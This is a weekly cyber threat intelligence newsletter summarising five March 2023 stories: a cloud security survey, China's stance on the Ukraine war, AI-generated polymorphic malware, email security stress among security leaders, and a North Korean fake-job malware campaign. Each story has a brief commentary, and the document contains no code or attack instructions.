General Worldwide activity:

1st: Palo Alto Survey Reveals 90% of Organizations Cannot Resolve Cyberthreats Within an Hour

Overview: Palo Alto Networks, the global cybersecurity leader, today published its 2023 State of Cloud-Native Security Report. The report surveyed more than 2,500 C-level executives around the world to better understand their cloud adoption strategies, and how those strategies work. With organizations of all sizes moving more of their operations to the cloud, a majority are struggling to automate cloud security and mitigate risks. It’s one reason why many companies are trying to improve security earlier in the development process, and looking for fewer vendors that can offer more security capabilities.

Breakdown: We have seen a massive focus on cl0ud infrastructure and the security necessary to keep it safe in the last several years. This is tied directly to a vast majority of companies pushing to move from traditional data center configurations to cloud only. A missing consideration with this push is that the cloud is just another form of a data center, with infrastructure that needs to be monitored and protected in the same way. We have seen an increase in real cloud focused security toolsets being adopted by companies, but it has still lagged behind attacks. This article shows the potential impacts such as a slow response time to attacks and a gap in awareness of which teams are responsible.

2nd: On Ukraine, China Prioritizes Its International Ambitions

Overview: Recently renewed allegations that China is considering providing lethal aid to Russia contrast starkly with Beijing’s calls for peace and continued assertions that it is “objective and just” regarding the war in Ukraine. Based on a review of China’s perspective on the war and what its leaders likely hope to achieve, Insikt Group judges that relations between China and the United States and Europe will almost certainly remain at odds for the duration of the war. Although China’s position suggests there are areas of potential collaboration on peace, Beijing is likely pursuing a strategy of using a peace settlement to shape how future international crises are addressed, which contains elements that are almost certainly unacceptable to the US and others.

Breakdown: The latest news from the Russia/Ukraine conflict is China’s attempts to get involved from a peacekeeping perspective. This article is a summary of the full report, available at the link in the article, on a real-world analysis of the current events by the intelligence research division from Recorded Future. Geo-politics will always have a large impact on the current threat landscape online, as nations and nation state groups get involved, sharing here for awareness around the current events.

3rd: BLACKMAMBA: USING AI TO GENERATE POLYMORPHIC MALWARE

Overview: The introduction of ChatGPT last year marked the first time neural network code synthesis was made freely available to the masses. This powerful and versatile tool can be used for everything from answering simple questions to instantly composing written works to developing original software programs, including malware — the latter of which introduces the potential for a dangerous new breed of cyber threats. Traditional security solutions like EDRs leverage multi-layer, data intelligence systems to combat some of today’s most sophisticated threats, and most automated controls claim to prevent novel or irregular behavior patterns, but in practice, this is very rarely the case. And with AI-generated, polymorphic malware becoming available to bad actors, the situation will only get worse.

Breakdown: The hype cycle around ChatGPT included a LOT of chatter around the code writing abilities of such a system and how that could potentially be abused in a malicious fashion. Here we have a cool walk-through of similar tactics being used to demonstrate the capabilities of a similar system to do that exact thing — create malware. There is no reason to freak out at this point, we have plenty of malware floating around already written to attack people, and we are not yet at the point that we will be flooded by AI generated attack code. It is a viable concern going forward, and this is a good demonstration of the way programmers can use these tools to augment their abilities, both for good and bad.

4th: 99% of Cybersecurity Leaders Are Stressed About Email Security

Overview: Egress, a cybersecurity company that provides intelligent email security, today released its Email Security Risk Report 2023. The report uncovers findings that demonstrate the prevalence of inbound and outbound email security incidents in Microsoft 365, with 92% of organizations falling victim to successful phishing attacks in the last 12 months, while 91% of organizations admit they have experienced email data loss. Not surprisingly, 99% of cybersecurity leaders confess to being stressed about email security. Specifically, 98% are frustrated with their Secure Email Gateway (SEG), with 53% conceding that too many phishing attacks bypass it.

Breakdown: Email continues to be a significant threat to all organizations and will be going forward considering it is a primary communication method everyone uses. Phishing and ransomware sit at the top of the list of attacks year after year, so it is no surprise almost everyone, including leadership in the info security space have it as a top concern. The fact that the report states 92% of organizations fell victim to a phishing attack and 98% of leaders are frustrated with their email gateway systems shows the massive impact email solutions have on general security risk status for all organizations.

5th: Security researchers targeted with new malware via job offers on LinkedIn

Overview: A suspected North Korean hacking group is targeting security researchers and media organizations in the U.S. and Europe with fake job offers that lead to the deployment of three new, custom malware families. The attackers use social engineering to convince their targets to engage over WhatsApp, where they drop the malware payload “PlankWalk,” a C++ backdoor that helps them establish a foothold in the target’s corporate environment. According to Mandiant, which has been tracking the particular campaign since June 2022, the observed activity overlaps with “Operation Dream Job,” attributed to the North Korean cluster known as the “Lazarus group.” However, Mandiant observed enough differences in the employed tools, infrastructure, and TTPs (tactics, techniques, and procedures) to attribute this campaign to a separate group they track as “UNC2970.” Furthermore, the attackers use previously unseen malware named ‘TOUCHMOVE’, ‘SIDESHOW’, and ‘TOUCHSHIFT,’ which have not been attributed to any known threat group. Mandiant says the particular group has previously targeted tech firms, media groups, and entities in the defense industry. Its latest campaign shows it has evolved its targeting scope and adapted its capabilities.

Breakdown: Tied in with the email issues above, we also continue to see nation-state backed groups targeting high risk groups with phishing attacks. Almost everyone involved in the day-to-day efforts of securing their organizations are high-risk employees due to their escalated levels of access to security toolsets and general IT infrastructure that is required to do their jobs. That makes them perfect targets for APT groups looking for admin level access into an organization. We have seen this kind of targeting many times in the past, here is another reminder that similar attacks keep occurring and will continue to be a serious threat.

Contact Us

contact@hunterstrategy.net

Our Website

Top five Cyber Threat Intel stories of the week: 03/06 to 03/10/2023